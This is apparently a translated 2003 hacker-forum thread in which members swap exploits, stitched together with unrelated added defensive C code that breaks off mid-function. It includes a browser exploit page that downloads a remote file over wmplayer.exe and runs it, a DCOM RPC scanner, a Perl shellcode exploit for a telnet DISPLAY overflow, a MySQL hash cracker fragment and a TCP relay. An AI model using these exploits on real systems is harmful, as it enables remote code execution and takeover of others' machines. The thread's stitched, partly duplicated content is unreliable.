* $ mysqlfast 6294b50f67eda209
* Hash: 6294b50f67eda209
* Trying length 3
* Trying length 4
* Found pass: barf
*
* The MySQL password hash function could be strengthened considerably
* by:
* - making two passes over the password
* - using a bitwise rotate instead of a left shift
* - causing more arithmetic overflows
*/
-----
hi
only compiled, but I can give the code
published Sep 05, 2003
updated Sep 05, 2003
vulnerable FoxWeb FoxWeb 2.5
FoxWeb is prone to a remotely exploitable buffer overrun vulnerability. This is due to insufficient bounds checking of user-supplied PATH_INFO data to the Foxweb CGI and ISAPI extension. Successful exploitation would permit a remote attacker to execute arbitrary code in the context of the software.
The following exploit was provided:
[Only registered and activated users can see links]
The vendor has reportedly released a patch to address this issue. This has not been confirmed by Symantec. Users should contact the vendor to determine the availability of fixes.
here is the code; I have already sent the compiled version.
bye - yours, koosha
dragonscalm
09-09-2003, 10:25 PM
I wrote it in Farsi
[Persian text garbled by extraction; the only legible words are "SQL BruteForce"]
My ID on that forum is delta force, though I have a few other IDs too, ok ;) but before posting a file, check that we haven't already posted it right here; now if you want, tell me your ID on that forum so I can see you there.
dragonscalm
09-09-2003, 10:29 PM
Also, I forgot to say: if you had looked at the .net site you would have seen that all the exploits you posted here were already on that site ;) but thanks for your effort; still, it's better to coordinate this effort with us so that work isn't done twice and energy isn't wasted. I think you understand what I'm saying.
Yours, cr0ssfire
hi
ok
I have nothing to say :d
bye
but I swear at least half of the exploits I post weren't here :d
ok
bye
by the way, my ID there is ni3_boom :d
bye
Hello, I hope this isn't a repost; I haven't seen it on ashiyane :d
# The script code starts here
#
function dcom_recv(socket)
{
local_var buf, len;
buf = recv(socket:socket, length:10);
if(strlen(buf) != 10)return NULL;
len = ord(buf[8]);
len += ord(buf[9])*256;
buf += recv(socket:socket, length:len - 10);
return buf;
}
port = 135;
if(!get_port_state(port))port = 593;
else {
soc = open_sock_tcp(port);
if(!soc)port = 593;
else close(soc);
}
if(!get_port_state(port))exit(0);
#-------------------------------------------------------------#
function hex2raw(s)
{
local_var i, j, ret;
for(i=0;i<strlen(s);i+=2)
{
if(ord(s[i]) >= ord("0") && ord(s[i]) <= ord("9"))
j = int(s[i]);
else
j = int((ord(s[i]) - ord("a")) + 10);
j *= 16;
if(ord(s[i+1]) >= ord("0") && ord(s[i+1]) <= ord("9"))
j += int(s[i+1]);
else
j += int((ord(s[i+1]) - ord("a")) + 10);
ret += raw_string(j);
}
return ret;
}
#--------------------------------------------------------------#
function check(req)
{
local_var soc, bindstr, error_code, r;
soc = open_sock_tcp(port);
if(!soc)exit(0);
bindstr = "05000b03100000004800000001000000d016d0160000000001 00000000000100a001000000000000c0000000000000460000 0000045d888aeb1cc9119fe808002b10486002000000";
send(socket:soc, data:hex2raw(s:bindstr));
r = dcom_recv(socket:soc);
if(!r)exit(0);
send(socket:soc, data:req);
r = dcom_recv(socket:soc);
if(!r)return NULL;
close(soc);
error_code = substr(r, strlen(r) - 4, strlen(r));
return error_code;
}
function check2(req)
{
local_var soc,bindstr, error_code, r;
soc = open_sock_tcp(port);
if(!soc)exit(0);
bindstr = "05000b03100000004800000001000000d016d0160000000001 00000000000100a001000000000000c0000000000000460000 0000045d888aeb1cc9119fe808002b10486002000000";
send(socket:soc, data:hex2raw(s:bindstr));
r = dcom_recv(socket:soc);
if(!r)exit(0);
send(socket:soc, data:req);
r = dcom_recv(socket:soc);
if(!r)return NULL;
close(soc);
error_code = substr(r, strlen(r) - 24, strlen(r) - 20);
return error_code;
}
#---------------------------------------------------------------#
# Determine if the remote host is running Win95/98/ME
bindwinme = "05000b03100000004800000053535641d016d0160000000001 00000000000100e6730ce6f988cf119af10020af6e72f40200 0000045d888aeb1cc9119fe808002b10486002000000";
soc = open_sock_tcp(port);
if(!soc)exit(0);
send(socket:soc, data:hex2raw(s:bindwinme));
rwinme = dcom_recv(socket:soc);
close(soc);
lenwinme = strlen(rwinme);
stubwinme = substr(rwinme, lenwinme-24, lenwinme-21);
# This is Windows 95/98/ME which is not vulnerable
if("02000100" >< hexstr(stubwinme))exit(0);
#----------------------------------------------------------------#
REGDB_CLASS_NOTREG = "5401048000";
CO_E_BADPATH = "0400088000";
NT_QUOTE_ERROR_CODE_EQUOTE = "00000000";
#
req1 = "0500000310000000b003000001000000980300000000040005 00020000000000000000000000000000000000000000000000 000000000000000000009005140068030000680300004d454f 5704000000a201000000000000c00000000000004638030000 00000000c00000000000004600000000380300003003000000 00000001100800ccccccccc80000000000000030030000d800 00000000000002000000070000000000000000000000000000 000000000018018d00b8018d000000000007000000b9010000 00000000c000000000000046ab01000000000000c000000000 000046a501000000000000c000000000000046a60100000000 0000c000000000000046a401000000000000c0000000000000 46ad01000000000000c000000000000046aa01000000000000 c0000000000000460700000060000000580000009000000058 000000200000006800000030000000c000000001100800cccc cccc5000000000000000ffffffff0000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000001100800cccccccc4800 000000000000005d889aeb1cc9119fe808002b104860100000 0000000000000000000100000000000000b8470a005800 000005000600010000000000000000000000c0000000000000 46cccccccc01100800cccccccc800000000000000000000000 00000000000000000000000020ba0900000000006000000060 0000004d454f5704000000c001000000000000c00000000000 00463b03000000000000c00000000000004600000000300000 0001000100673c70941333fd4687244d093988939d02000000 00000000000000000000000000000000000000000100000001 100800cccccccc480000000000000000000000b07e09000000 000000000000f0890a0000000000000000000d000000000000 000d000000730061006a00690061006400650076005f007800 3800360000000800cccccccc01100800cccccccc1000000000 0000000000000000000000000000000000000001100800cccc cccc5800000000000000c05e0a000000000000000000000000 001b000000000000001b0000005c005c0000005c006a006900 61006400650076005f007800000036005c007000750062006c 00690063005c00410041004100410000000000010015000110 0800cccccccc200000000000000000000000905b0900020000 0001006c00c0df0800010000000700550000000000";
req2 = "0500000310000000b003000002000000980300000000040005 00020000000000000000000000000000000000000000000000 000000000000000000009005140068030000680300004d454f 5704000000a201000000000000c00000000000004638030000 00000000c00000000000004600000000380300003003000000 00000001100800ccccccccc80000000000000030030000d800 00000000000002000000070000000000000000000000000000 000000000018018d00b8018d000000000007000000b9010000 00000000c000000000000046ab01000000000000c000000000 000046a501000000000000c000000000000046f60100000000 0000c000000000000046ff01000000000000c0000000000000 46ad01000000000000c000000000000046aa01000000000000 c0000000000000460700000060000000580000009000000058 000000200000006800000030000000c000000001100800cccc cccc5000000000000000ffffffff0000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000001100800cccccccc4800 000000000000005d889aeb1cc9119fe808002b104860100000 0000000000000000000100000000000000b8470a005800 000005000600010000000000000000000000c0000000000000 46cccccccc01100800cccccccc800000000000000000000000 00000000000000000000000020ba0900000000006000000060 0000004d454f5704000000c001000000000000c00000000000 00463b03000000000000c00000000000004600000000300000 0001000100673c70941333fd4687244d093988939d02000000 00000000000000000000000000000000000000000100000001 100800cccccccc480000000000000000000000b07e09000000 000000000000f0890a0000000000000000000d000000000000 000d000000730061006a00690061006400650076005f007800 3800360000000800cccccccc01100800cccccccc1000000000 0000000000000000000000000000000000000001100800cccc cccc5800000000000000c05e0a000000000000000000000000 001b000000000000001b0000005c005c0000005c006a006900 61006400650076005f007800000036005c007000750062006c 00690063005c00410041004100410000000000010015000110 0800cccccccc200000000000000000000000905b0900020000 0001006c00c0df0800010000000700550000000000";
req3 = "05000e03100000004800000003000000d016d01605af000001 00000001000100b84a9f4d1c7dcf11861e0020af6e7c570000 0000045d888aeb1cc9119fe808002b10486002000000";
req4 = "05000003100000009a00000003000000820000000100000005 00020000000000000000000000000000000000000000000000 0000000000009596952a8cda6d4ab23619bcaf2c2dea34eb8f 000700000000000000070000005c005c004d0045004f005700 00000000000000005c0048005c0048000100000058e98f0001 0000009596952a8cda6d4ab23619bcaf2c2dea010000000100 00005c00";
#display(hex2raw(s:req));
#exit(0);
error1 = check(req:hex2raw(s:req1));
error2 = check(req:hex2raw(s:req2));
#error3 = check(req:hex2raw(s:req3));
#error4 = check2(req:hex2raw(s:req4));
#display("error1=", hexstr(error1), "\n");
#display("error2=", hexstr(error2), "\n");
#display("error3=", hexstr(error3), "\n");
#display("error4=", hexstr(error4), "\n");
if(hexstr(error2) == hexstr(error1))
{
if(hexstr(error1) == "0500078000")exit(0); # DCOM disabled
security_hole(port);
}
else {
set_kb_item(name:"SMB/KB824146", value:TRUE);
}
Hello, I got this as the new DCOM scanner. By the way, has anyone found DCOM on port 1025?
God willing, we'll post the new DCOM on the site too :d
bye
hi, this is the exploit link
[Only registered and activated users can see links]
I've also posted the compiled version
I didn't see it on the site; if it was there, sorry
Guys, what's the news today: Buffer Overflow in UDP broadcasts for Microsoft SQL Server client utilities
Date: 2003-09-10
Author : Aaron C. Newman (Application Security, Inc.) <[Only registered and activated users can see links]>
Risk level: High
[Only registered and activated users can see links]
Summary:
A Unicode buffer overflow exists in MDAC which is used by the SQL Server SQL-DMO library that could allow a remote user to execute malicious code on the target computer. The vulnerability does not occur when accepting incoming connections, but rather in the response to broadcast queries.
Details:
One of the features of the SQL Server network libraries is the ability to query a list of SQL Servers on the local network. This is accomplished by sending a UDP broadcast on port 1434 which will reach all applications on the local subnet. This function is a component of SQL-DMO which is used by the SQL Server Service Manager (whenever it is started), Enterprise Manager (when registering a server), Query Analyzer and SQL Profiler (when clicking "..." button), DTS (when selecting a SQL Server), etc...
All SQL Servers receiving the broadcast request respond with a standard UDP packet. If a malicious machine responds to this broadcast with an overlong packet, a stack buffer overflow occurs. The overflow occurs in a UNICODE string, so the Venetian method of performing a buffer overflow would need to be used to exploit this vulnerability. There is a white paper from Chris Anley on how this is done, as well as a presentation from Dave Aitel.
Any SQL Server utilities that use the SQL-DMO function to retrieve a list of SQL Servers will be vulnerable to this attack. An attack is not mounted directly against the target. Instead an attacker could attempt several methods of exploiting the vulnerability:
1) Setup a service listening for data on UDP port 1434 and responding with the attack payload whenever data is received. This network would require being on the same subnet.
2) Bombarding a remote subnet with UDP attack packets waiting for someone to query the network. For example, send the attack packet every 2 seconds to 192.168.3.255 will reach all machines on the 192.168.3.x subnet. When someone finally does send a UDP broadcast, they will accept this packet and be exploited. This method would take a bit of luck, persistence, or some social engineering.
3) It may also be possible for a non-privileged login in MS SQL to cause the SQL Server to send out a query request directly to an IP Address on the network. The following SQL statement causes the SQL Server to query a host named SERVER with a UDP packet:
SELECT * FROM openrowset( 'SQLOLEDB', 'server=SERVER\instance name;uid=sa;pwd=', '')
However, on our systems, we were unable to trigger the overflow from the response. There may be other methods to cause the SQL Server to send the UDP query and trigger the overflow.
One of the features of SQL Server which makes this vulnerability simpler to exploit is that the SQL Server Service Manager queries the network using SQL-DMO every time it starts which happens when a user with the SQL Server client utilities logs into Windows. This would occur anytime someone logged into the Windows server on which SQL Server is installed, or anytime a database administrator logs into his or her machine.
Links:
[Only registered and activated users can see links]
[Only registered and activated users can see links] technet/security/bulletin/MS03-033.asp
Fix:
This vulnerability affects the following packages:
Microsoft Data Access Components 2.7 SP1
Microsoft Data Access Components 2.7
Microsoft Data Access Components 2.6 SP2
Microsoft Data Access Components 2.5 SP3
Microsoft Data Access Components 2.5 SP2
If you have one of these packages installed, apply the hot fix from
[Only registered and activated users can see links]
Guys, here's today's news: Buffer Overflow in UDP broadcasts for Microsoft SQL Server client utilities
Date: 2003-09-10
Author: Aaron C. Newman (Application Security, Inc.) <[Only registered and activated users can see links]>
Risk level: High
[Only registered and activated users can see links]
Summary:
A Unicode buffer overflow exists in MDAC which is used by the SQL Server SQL-DMO library that could allow a remote user to execute malicious code on the target computer. The vulnerability does not occur when accepting incoming connections, but rather in the response to broadcast queries.
Details:
One of the features of the SQL Server network libraries is the ability to query a list of SQL Servers on the local network. This is accomplished by sending a UDP broadcast on port 1434 which will reach all applications on the local subnet. This function is a component of SQL-DMO which is used by the SQL Server Service Manager (whenever it is started), Enterprise Manager (when registering a server), Query Analyzer and SQL Profiler (when clicking "..." button), DTS (when selecting a SQL Server), etc...
All SQL Servers receiving the broadcast request respond with a standard UDP packet. If a malicious machine responds to this broadcast with an overlong packet, a stack buffer overflow occurs. The overflow occurs in a UNICODE string, so the Venetian method of performing a buffer overflow would need to be used to exploit this vulnerability. There is a white paper from Chris Anley on how this is done, as well as a presentation from Dave Aitel.
Any SQL Server utilities that use the SQL-DMO function to retrieve a list of SQL Servers will be vulnerable to this attack. An attack is not mounted directly against the target. Instead an attacker could attempt several methods of exploiting the vulnerability:
1) Set up a service listening for data on UDP port 1434 and responding with the attack payload whenever data is received. This would require being on the same subnet.
2) Bombarding a remote subnet with UDP attack packets, waiting for someone to query the network. For example, sending the attack packet every 2 seconds to 192.168.3.255 will reach all machines on the 192.168.3.x subnet. When someone finally does send a UDP broadcast, they will accept this packet and be exploited. This method would take a bit of luck, persistence, or some social engineering.
3) It may also be possible for a non-privileged login in MS SQL to cause the SQL Server to send out a query request directly to an IP Address on the network. The following SQL statement causes the SQL Server to query a host named SERVER with a UDP packet:
SELECT * FROM openrowset( 'SQLOLEDB', 'server=SERVER\instance name;uid=sa;pwd=', '')
However, on our systems, we were unable to trigger the overflow from the response. There may be other methods to cause the SQL Server to send the UDP query and trigger the overflow.
One of the features of SQL Server which makes this vulnerability simpler to exploit is that the SQL Server Service Manager queries the network using SQL-DMO every time it starts which happens when a user with the SQL Server client utilities logs into Windows. This would occur anytime someone logged into the Windows server on which SQL Server is installed, or anytime a database administrator logs into his or her machine.
Links:
[Only registered and activated users can see links]
[Only registered and activated users can see links] technet/security/bulletin/MS03-033.asp
Fix:
This vulnerability affects the following packages:
Microsoft Data Access Components 2.7 SP1
Microsoft Data Access Components 2.7
Microsoft Data Access Components 2.6 SP2
Microsoft Data Access Components 2.5 SP3
Microsoft Data Access Components 2.5 SP2
If you have one of these packages installed, apply the hot fix from
[Only registered and activated users can see links]
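As an added example (not part of the advisory above, and not Application Security's or Microsoft's code), here is the receive-side check a SQL-DMO style client could apply to every UDP/1434 reply before any string handling: the reply layout (a 0x05 byte, a 16-bit little-endian length, then ASCII "key;value;" text) is the SQL Server Resolution Protocol format as I recall it, and the 1024-byte cap, the field names and the sample replies are my assumptions.

```c
/* Added example, not from the advisory: a defensive check for the UDP/1434 reply a
 * SQL-DMO style client receives after its broadcast. Assumed layout (the SQL Server
 * Resolution Protocol reply as I recall it): byte 0x05, 16-bit little-endian length,
 * then an ASCII "key;value;...;;" string. Everything is validated before any string
 * handling, so an overlong or malformed reply is dropped rather than copied. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>
#include <ctype.h>

#define SSRP_RESP_HDR 0x05
#define SSRP_MAX_BODY 1024   /* assumed cap; genuine replies are a few hundred bytes */

enum ssrp_status { SSRP_OK = 0, SSRP_SHORT, SSRP_BAD_HDR, SSRP_OVERLONG,
                   SSRP_LEN_MISMATCH, SSRP_NONPRINT };

struct ssrp_info {
    char server[64];
    char instance[64];
    int  tcp_port;          /* -1 when the reply carries no tcp; field */
};

/* Constructed sample body (not a capture) in the assumed key;value; layout. */
const char SSRP_SAMPLE_GOOD[] =
    "ServerName;SQLBOX;InstanceName;MSSQLSERVER;IsClustered;No;"
    "Version;8.00.194;tcp;1433;np;\\\\SQLBOX\\pipe\\sql\\query;;";

/* Build a reply packet from a body string; used only to create test input. */
size_t ssrp_build(uint8_t *buf, size_t bufsz, const char *body)
{
    size_t n = strlen(body);
    if (n > 0xFFFF || n + 3 > bufsz)
        return 0;
    buf[0] = SSRP_RESP_HDR;
    buf[1] = (uint8_t)(n & 0xFF);
    buf[2] = (uint8_t)(n >> 8);
    memcpy(buf + 3, body, n);
    return n + 3;
}

/* Copy the value that follows "key;" into out (bounded). Returns 1 if found. */
static int ssrp_field(const char *body, size_t n, const char *key,
                      char *out, size_t outsz)
{
    size_t klen = strlen(key);
    for (size_t i = 0; i + klen <= n; i++) {
        if ((i == 0 || body[i - 1] == ';') && memcmp(body + i, key, klen) == 0) {
            size_t j = i + klen, k = 0;
            while (j < n && body[j] != ';' && k + 1 < outsz)
                out[k++] = body[j++];
            out[k] = '\0';
            return 1;
        }
    }
    return 0;
}

/* Validate a raw reply of len bytes; on SSRP_OK the parsed fields are in *out. */
enum ssrp_status ssrp_check(const uint8_t *pkt, size_t len, struct ssrp_info *out)
{
    char portbuf[8];
    memset(out, 0, sizeof *out);
    out->tcp_port = -1;
    if (len < 3)
        return SSRP_SHORT;
    if (pkt[0] != SSRP_RESP_HDR)
        return SSRP_BAD_HDR;
    size_t body_len = pkt[1] | ((size_t)pkt[2] << 8);
    if (body_len > SSRP_MAX_BODY)       /* the case the bulletin describes */
        return SSRP_OVERLONG;
    if (body_len + 3 != len)            /* truncated, or trailing bytes */
        return SSRP_LEN_MISMATCH;
    const char *body = (const char *)pkt + 3;
    if (body_len && body[body_len - 1] == '\0')
        body_len--;                     /* tolerate a single trailing NUL */
    for (size_t i = 0; i < body_len; i++)
        if (!isprint((unsigned char)body[i]))
            return SSRP_NONPRINT;
    ssrp_field(body, body_len, "ServerName;", out->server, sizeof out->server);
    ssrp_field(body, body_len, "InstanceName;", out->instance, sizeof out->instance);
    if (ssrp_field(body, body_len, "tcp;", portbuf, sizeof portbuf)) {
        int p = atoi(portbuf);
        if (p >= 1 && p <= 65535)
            out->tcp_port = p;
    }
    return SSRP_OK;
}

int main(void)
{
    uint8_t pkt[256];
    struct ssrp_info info;
    size_t n = ssrp_build(pkt, sizeof pkt, SSRP_SAMPLE_GOOD);
    enum ssrp_status st = ssrp_check(pkt, n, &info);
    printf("status=%d server=%s instance=%s tcp=%d\n",
           (int)st, info.server, info.instance, info.tcp_port);
    return st == SSRP_OK ? 0 : 1;
}
```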
hi
dcom2 scanner
a file with the code, a compiled one, and another link, bye:
[Only registered and activated users can see links]
hi, I hope this is new and you enjoy it :d
------------------
<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "[Only registered and activated users can see links]",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
</textarea>
Wait a couple of seconds..
<script language="javascript">
function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media")
}
window.open("error.jsp","_media");
setTimeout("doit()", 5000);
</script>
hi, exploit for RealOne Player 9
hi, sorry if this is a repeat, but I don't think it is
here is the latest news .....
hi guys
this is the rpc2 code; someone compile it, this one is reliable :d
[Only registered and activated users can see links]
and this is an rpc2 for the Chinese version, if I've got that right
if you can, add targets to it
bye
about that dcom2 whose compiled build I posted, I should add this:
0--------------------------0
it's only for CN Win2k SP3/SP4 + MS03-026 (patched)
adds user SST to Administrators, pass: 557
-----
thx
bye
guys, I saw this, it might be useful to you
----
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <errno.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/wait.h>
#undef False
#define False 0
#undef True
#define True 1
#define DEFAULT_REMOTE_PORT 23
/*
* Define this if <unistd.h> doesn't declare getopt() and friends.
*/
#define BOGUS_UNISTD
static void perror_exit(const char *msg)
{
perror(msg);
_exit(1);
}
static void* xrealloc(void *ptr, size_t size)
{
if (!ptr)
ptr = malloc(size); /* Hack for broken C libraries */
else
ptr = realloc(ptr, size);
if (!ptr)
perror_exit("malloc");
return ptr;
}
static struct in_addr *allowed_hosts = NULL;
static long n_hosts = 0;
static long n_alloced = 0;
static void allow_host(char *host)
{
struct hostent *hent;
hent = gethostbyname(host);
if (!hent) {
fprintf(stderr, "No such host: %s\n", host);
return;
}
if (n_hosts >= n_alloced)
allowed_hosts = xrealloc(allowed_hosts,
(n_alloced = 2 * (n_alloced + 1)) *
sizeof allowed_hosts[0]);
memcpy(&allowed_hosts[n_hosts++], hent->h_addr, hent->h_length);
}
static int is_allowed(struct sockaddr_in *addr)
{
long i;
for (i = 0 ; i < n_hosts ; i++)
if (memcmp(&addr->sin_addr, &allowed_hosts[i],
sizeof addr->sin_addr) == 0)
return True;
return False;
}
static struct sockaddr_in get_remote_host(char *host)
{
struct sockaddr_in addr;
struct hostent *hent;
char *c;
memset(&addr, 0, sizeof addr);
addr.sin_family = PF_INET;
addr.sin_port = htons(DEFAULT_REMOTE_PORT);
c = strchr(host, ':');
if (c) {
*c++ = '\0';
/* FIXME: error check? */
addr.sin_port = htons(atoi(c));
}
hent = gethostbyname(host);
if (!hent) {
fprintf(stderr, "No such host: %s\n", host);
_exit(1);
}
memcpy(&addr.sin_addr, hent->h_addr, hent->h_length);
return addr;
}
static int do_rw(int from, int to)
{
static char buffer[16384];
char *c;
long i, j, n;
do {
n = read(from, buffer, sizeof buffer);
} while (n < 0 && errno == EINTR);
c = buffer;
i = n;
while (i > 0) {
j = write(to, c, i);
if (j < 0)
if (errno == EINTR)
continue;
else
return -1;
if (j == 0)
return 0;
c += j;
i -= j;
}
return n;
}
static int open_serv_socket(struct sockaddr_in *serv_addr)
{
int ss, tmp;
ss = socket(PF_INET, SOCK_STREAM, 0);
if (ss < 0)
return -1;
do {
tmp = connect(ss, (struct sockaddr *)serv_addr, sizeof *serv_addr);
} while (tmp < 0 && errno == EINTR);
if (tmp < 0) {
perror("connect");
close(ss);
return -1;
}
return ss;
}
static int child(struct sockaddr_in *serv_addr, int cs)
{
fd_set fds;
int max, ss, tmp = 0;
ss = open_serv_socket(serv_addr);
if (ss < 0)
return -1;
FD_ZERO(&fds);
FD_SET(cs, &fds);
FD_SET(ss, &fds);
max = (cs > ss ? cs : ss) + 1;
for (;;) {
fd_set rd_fds = fds;
tmp = select(max, &rd_fds, NULL, NULL, NULL);
if (tmp < 0)
if (errno == EINTR)
continue;
else
break;
if (FD_ISSET(cs, &rd_fds)) {
tmp = do_rw(cs, ss);
if (tmp <= 0)
break;
}
if (FD_ISSET(ss, &rd_fds)) {
tmp = do_rw(ss, cs);
if (tmp <= 0)
break;
}
}
if (tmp < 0)
perror("read/write");
close(ss);
return tmp;
}
static void doit(struct sockaddr_in *serv_addr, int port, int single)
{
struct sockaddr_in local_addr, cli_addr;
int as;
int yes = 1;
memset(&local_addr, 0, sizeof local_addr);
local_addr.sin_family = PF_INET;
local_addr.sin_port = port;
as = socket(PF_INET, SOCK_STREAM, 0);
if (as < 0)
perror_exit("socket");
if (setsockopt(as, SOL_SOCKET, SO_REUSEADDR, (char *)&yes, sizeof yes) < 0)
perror_exit("setsockopt(SO_REUSEADDR)");
if (bind(as, (struct sockaddr *)&local_addr, sizeof local_addr) < 0)
perror_exit("bind");
if (listen(as, 5) < 0)
perror_exit("listen");
for (;;) {
int cs;
socklen_t len; /* accept() takes a socklen_t *, not an int * */
do {
len = sizeof cli_addr;
cs = accept(as, (struct sockaddr *)&cli_addr, &len);
} while (cs < 0 && errno == EINTR);
if (cs < 0)
perror_exit("accept");
if (!is_allowed(&cli_addr)) {
static char deny[] = "502 You have no permission to talk!\r\n";
if (serv_addr->sin_port == htons(119))
write(cs, deny, sizeof deny - 1);
shutdown(cs, 2);
close(cs);
continue;
}
if (single)
child(serv_addr, cs);
else
switch (fork()) {
case -1:
perror_exit("fork");
break;
case 0:
if (child(serv_addr, cs) < 0)
_exit(1);
_exit(0);
default:
break;
}
close(cs);
}
}
/************************************************************************/
static void sig_chld(int no)
{
while (waitpid(-1, NULL, WNOHANG) > 0);
}
static void install_sig_handlers(void)
{
struct sigaction sig_act;
sig_act.sa_handler = sig_chld;
sig_act.sa_flags = 0;
sigfillset(&sig_act.sa_mask);
if (sigaction(SIGCHLD, &sig_act, NULL) < 0)
perror_exit("sigaction(SIGCHLD)");
sig_act.sa_handler = SIG_IGN;
sig_act.sa_flags = 0;
sigemptyset(&sig_act.sa_mask);
if (sigaction(SIGPIPE, &sig_act, NULL) < 0)
perror_exit("sigaction(SIGPIPE)");
}
static void usage(char *name)
{
fprintf(stderr, "Usage: %s -p port [-s] -h host [...] remotehost:port\n",
name);
_exit(1);
}
int main(int argc, char *argv[])
{
struct sockaddr_in serv_addr;
int single = False;
int port = 0;
int c;
#ifdef BOGUS_UNISTD
extern int getopt(int, char *const[], const char*);
extern char *optarg;
extern int optind, opterr;
#endif
freopen("/dev/null", "r", stdin);
freopen("/dev/null", "w", stdout);
install_sig_handlers();
opterr = 0;
while ((c = getopt(argc, argv, "p:h:s")) != -1)
switch (c) {
case 'p': /* port to listen on */
if (sscanf(optarg, "%d", &port) != 1 || port < 0)
usage(argv[0]);
port = htons(port);
break;
case 's':
single = True;
break;
case 'h':
allow_host(optarg);
break;
default:
usage(argv[0]);
break;
}
if (optind != argc - 1 || port == 0)
usage(argv[0]);
if (n_hosts <= 0) {
fprintf(stderr, "No allowed hosts!\n");
_exit(1);
}
serv_addr = get_remote_host(argv[optind]);
doit(&serv_addr, port, single);
return 0;
}
// EOF
read this!!
------
Affected: Linux: Debian, Redhat, Mandrake, Slackware, possibly others
BSD: FreeBSD, possibly others
Bug: there is a bug in the telnet client that causes a stack overflow by filling the DISPLAY environment variable with approx. 1000-3000 bytes, allowing possible code execution to take place.
---
Example:
[ dethy@syn ] $ export DISPLAY=`perl -e 'print "A"x1000'`
[ dethy@syn ] $ telnet localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Segmentation fault (core dumped)
Now loading up gdb, we see the following:
#0 0x41414141 in ?? ()
(gdb) info all-registers
eax 0xbfbfd672 -1077946766
ecx 0x3e 62
edx 0x80574d0 134575312
ebx 0xf0 240
esp 0xbfbfd6e8 0xbfbfd6e8
ebp 0x41414141 0x41414141
esi 0xc 12
edi 0xf 15
eip 0x41414141 0x41414141
eflags 0x10246 66118
..a successful hit! EIP and EBP were overwritten, thus arbitrary code could
be spawned, but a shell is good enough for us. :)
Below is a proof of concept exploit that demonstrates the overflow by spawning
a shell through telnet, once the environment variable has been set.
#!/usr/bin/perl
# Generic exploit program in perl, which clears the environment to take
# away the need for offset guessing.
# Dvorak (@synnergy.net // @hit2000.org) 1999.
$egg = "\x90" x 1500;
$egg .= "\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76";
$egg .= "\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b";
$egg .= "\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff";
$egg .= "\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff";
$egg .= "\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02";
$egg .= "\x02\x02\x02/bin/sh.-c.sh";
foreach $key (keys %ENV) {
delete $ENV{$key};
}
# change the size of $buf if you need to.
$buf="";
for ($i = 0; $i < 256; $i++) {
$buf .= "\x01\xda\xbf\xbf";
}
# Put here your use for $buf, the string to exploit the vulnerable program with
$ENV{"DISPLAY"} = $buf;
$ENV{"egg"} = $egg;
system("/usr/bin/telnet localhost");
printf("Exploit done\n");
-- bye
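Added example, not part of the advisory or Dvorak's exploit above: the fix side of this bug class. The telnet client's flaw is copying an unbounded DISPLAY value into a fixed stack buffer; the function below looks DISPLAY up in an explicit environ-style array (so it can be tested without touching the real environment), refuses values longer than the destination or an assumed 255-byte cap, and restricts them to the host:display.screen character set. The cap, the character rules and the sample environments are my assumptions.

```c
/* Added example, not part of the advisory or the exploit above: the fix side of
 * this bug class. The telnet client copied an unbounded DISPLAY value into a fixed
 * stack buffer; this version looks DISPLAY up in an explicit environ-style array
 * (so it can be tested), refuses anything longer than the destination or an
 * assumed 255-byte cap, and accepts only host:display.screen characters. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define DISPLAY_MAX 255   /* assumed upper bound; real values look like "host:0.0" */

enum display_rc { DISPLAY_OK = 0, DISPLAY_UNSET, DISPLAY_TOO_LONG, DISPLAY_BAD_CHAR };

/* Find NAME in a NULL-terminated "KEY=value" array and return its value. */
static const char *env_lookup(char *const *envp, const char *name)
{
    size_t nlen = strlen(name);
    for (; envp && *envp; envp++)
        if (strncmp(*envp, name, nlen) == 0 && (*envp)[nlen] == '=')
            return *envp + nlen + 1;
    return NULL;
}

/* Bounded replacement for the unchecked copy. The length scan stops at the cap,
 * so a multi-kilobyte value is rejected without ever being walked or copied. */
enum display_rc get_display(char *const *envp, char *dst, size_t dstsz)
{
    const char *val = env_lookup(envp, "DISPLAY");
    if (!val)
        return DISPLAY_UNSET;
    size_t n = 0;
    while (n <= DISPLAY_MAX && val[n] != '\0')
        n++;
    if (n > DISPLAY_MAX || n + 1 > dstsz)
        return DISPLAY_TOO_LONG;
    /* assumed grammar: host may contain letters, digits, '.', '-', '_';
     * exactly one ':'; after it only digits and at most one '.' (the screen) */
    int colon = 0, dots_after = 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)val[i];
        if (c == ':') {
            if (colon++)
                return DISPLAY_BAD_CHAR;
        } else if (c == '.') {
            if (colon && dots_after++)
                return DISPLAY_BAD_CHAR;
        } else if (colon ? !isdigit(c) : !(isalnum(c) || c == '-' || c == '_')) {
            return DISPLAY_BAD_CHAR;
        }
    }
    if (!colon)
        return DISPLAY_BAD_CHAR;
    memcpy(dst, val, n + 1);
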